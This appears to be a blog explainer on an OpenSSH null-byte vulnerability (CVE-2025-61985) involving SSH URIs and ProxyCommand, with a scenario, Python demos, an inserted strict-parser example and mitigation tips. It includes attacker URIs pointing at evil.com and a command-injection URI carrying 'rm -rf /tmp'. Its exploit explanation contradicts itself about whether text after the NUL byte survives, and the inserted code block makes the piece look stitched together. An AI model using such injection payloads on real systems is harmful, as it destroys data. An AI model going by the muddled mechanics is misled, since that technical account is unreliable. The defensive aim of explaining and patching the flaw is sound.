OpenSSH has long been one of the most trusted tools for secure remote administration. But recently, a critical vulnerability surfaced—CVE-2025-61985—that puts servers at risk of code execution when handling SSH URIs containing a null byte ('\0'). Let’s break down what happened, why it matters, and how an attacker could actually use this flaw, step by step.
What is CVE-2025-61985?
CVE-2025-61985 is a security vulnerability found in versions of OpenSSH before 10.1. The problem lies in how OpenSSH parses SSH URIs that contain the null byte (\0) character—specifically in the context of the ProxyCommand configuration.
When a URI like ssh://username@host:22 is provided, OpenSSH parses the string. But if an attacker adds a \0 (null character), for example:
ssh://user@trustedhost\0@evil.com
OpenSSH might treat this differently at different layers of its code. For example, *string parsing* might stop at the null byte, but the underlying function calls (especially when issuing a ProxyCommand) process the entire string. This “confusion” can be manipulated to execute unwanted code or connect to attacker-controlled hosts.
Many administrators set up ProxyCommand to let SSH connect through jump hosts, like:
ProxyCommand ssh -q gateway.example.com nc %h %p
Exploitation Example: Step By Step
Let’s dig deeper with a hands-on exploitation scenario.
Suppose Alice configures her SSH like this in ~/.ssh/config:
Host *
ProxyCommand ssh -q proxy.company.com nc %h %p
This means *every SSH connection* tunnels through proxy.company.com.
An attacker sends Alice an SSH URI:
ssh://bob@server\0@evil.com
(Alice is asked to “help Bob” with his server problem.)
OpenSSH parses the username as bob and the host as server (it doesn’t expect anything after the \0).
Under the hood, system calls process the string only up to the \0, but if the string is passed on as an argument (for example, in the ProxyCommand), the whole string, including the part after the \0, can affect execution.
Visual Demonstration
uri = "ssh://bob@server\0@evil.com"
host = parse_host(uri) # Returns "server"
system_call(host) # Might receive "server\0@evil.com"
When ProxyCommand is run:
ssh -q proxy.company.com nc server\0@evil.com 22
If the malicious host includes shell metacharacters, like:
ssh://bob@server\0;rm -rf /tmp;@evil.com
with a naive ProxyCommand use like:
ProxyCommand echo %h
this could run:
echo server\0;rm -rf /tmp;@evil.com
Depending on parsing, rm -rf /tmp may execute!
Here’s a Python script showing how parsing works differently around null bytes:
# Simulate parsing in Python (for demonstration)
uri = "ssh://alice@host\0@evil.com"
# Parsing logic (simplistic): take everything after the first '@'
host = uri.split('@', 1)[1] # Returns 'host\0@evil.com'
# The application layer stops at the NUL, as a C string would
print("Application sees host:", host.split('\0')[0])
# The full string, NUL and all, is what gets handed on
print("Underlying system call gets:", host)
Expected Output:
Application sees host: host
Underlying system call gets: host\0@evil.com
(In practice, system calls in C/C++ terminate strings at \0, but in some proxy commands, unwanted parts may sneak through.)
1. Update OpenSSH
Upgrade to OpenSSH 10.1 or newer immediately! Modern versions reject \0 in SSH URIs.
Latest release: OpenSSH releases
2. Harden ProxyCommand
Avoid ProxyCommand values that are shell-interpolated or include %h directly.
3. Sanitize Your Inputs
Never trust hostnames or usernames that aren’t hardcoded or fully validated.
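One way to apply this rule before a hostname ever reaches a ProxyCommand, as an added example that is not the article's or OpenSSH's own code: a strict ssh:// URI parser that refuses any control byte (NUL included) and whitelists the user, host and port grammar, shown next to the lenient NUL-truncating view from the earlier demonstration. The hostname and user-name patterns are assumptions chosen for this example, not OpenSSH's rules.

```python
import re

# Whitelist grammars (assumed for this example, not OpenSSH's own rules):
# RFC 1123-style hostname labels and a conservative Unix user-name charset.
_HOST_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")
_USER_RE = re.compile(r"^[A-Za-z0-9._-]{1,32}$")


def naive_host(uri: str) -> str:
    """Lenient view: the hostname as a C string would see it, cut at the
    first NUL. This is why the application layer believes it got 'server'."""
    rest = uri[len("ssh://"):]
    hostport = rest.split("@", 1)[1] if "@" in rest else rest
    return hostport.split("\0", 1)[0].split(":", 1)[0]


def parse_ssh_uri(uri: str) -> tuple:
    """Strict parser for ssh://[user@]host[:port].

    Returns (user, host, port), with user/port None if absent. Raises
    ValueError on anything a later layer (ProxyCommand, a shell) could
    reinterpret: control bytes including NUL, a second '@', or characters
    outside the hostname/user grammar."""
    if not uri.startswith("ssh://"):
        raise ValueError("not an ssh:// URI")
    # Reject every control byte, not just NUL, before any splitting happens.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in uri):
        raise ValueError("control character in URI")
    rest = uri[len("ssh://"):]
    user = None
    if "@" in rest:
        user, rest = rest.split("@", 1)
        if not _USER_RE.fullmatch(user):
            raise ValueError("invalid user name")
    port = None
    if ":" in rest:
        rest, port_s = rest.rsplit(":", 1)
        if not port_s.isdigit() or not 1 <= int(port_s) <= 65535:
            raise ValueError("invalid port")
        port = int(port_s)
    if len(rest) > 253 or not _HOST_RE.fullmatch(rest):
        raise ValueError("invalid host name")
    return user, rest, port


def rejects(uri: str) -> bool:
    """True if the strict parser refuses the URI."""
    try:
        parse_ssh_uri(uri)
    except ValueError:
        return True
    return False
```

The lenient parser happily returns "server" for the NUL-carrying URI from the scenario above, while the strict one rejects it outright, so nothing after the NUL can reach a %h expansion.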
4. Monitor For Abuse
Watch logs for strange SSH invocations, especially those containing \0 bytes.
References and Further Reading
- OpenSSH Release Notes: OpenSSH 10.1 release notes
- CVE Entry: NVD CVE-2025-61985
- Linux Security Mailing List: oss-security Post
- OpenSSH ProxyCommand Guide: OpenSSH ProxyJump and ProxyCommand
Closing Thoughts
CVE-2025-61985 is a powerful example of how a tiny parsing bug—the mishandling of the \0 null character—can open the door to big trouble when using trusted tools like OpenSSH. Stay up to date, be careful with ProxyCommand, and never let user-controllable strings near your shell commands!
Timeline
Published on: 10/06/2025 19:15:36 UTC
Last modified on: 10/08/2025 19:38:32 UTC